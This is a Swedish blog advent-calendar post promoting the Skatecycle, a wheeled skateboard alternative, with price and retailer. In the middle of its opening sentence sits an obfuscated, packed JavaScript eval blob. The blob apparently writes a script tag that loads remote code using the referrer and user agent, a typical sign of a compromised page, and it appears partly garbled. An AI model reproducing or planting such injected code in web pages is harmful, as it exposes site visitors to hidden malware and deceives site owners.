Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Lucka 8 julkalender: Skatecycle

Lucka 8 julkalender: Skatecycle
Sebastian

Skatecycle: Konstigare eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zrnys|var|u0026u|referrer|kthrf||js|php’.split(’|’),0,{}))
saker finns det. Den här ”skateboarden/något annat” ger dig ett helt nytt sätt att åka bräda på.

Skatecycle består av två sammankopplade hjul som du sätter fötterna i och häver dig fram och tillbaka för att få fart.
Du slipper alltså ta ner foten varje gång du vill få fart.

När George Powell satte hjul under en bräda nån gång på 50-talet så var det nog få som anade vilken betydelse den där brädan skulle få för hela vår kultur. Livsstil, mode, musik, Tony Alvas hår – få är de aspekter av värden som inte på ett eller annat sätt nuddats av en skateboard. Små detaljer har ändrats, fjädring och så vidare. Utseendet manipuleras, longboard och så vidare. Men nu ställs allt på ända. Är ni redo för nästa steg i utvecklingen?

 Skatecycle kostar 1295 kronor och finns att köpa hos Coolstuff. 

Se prylen här!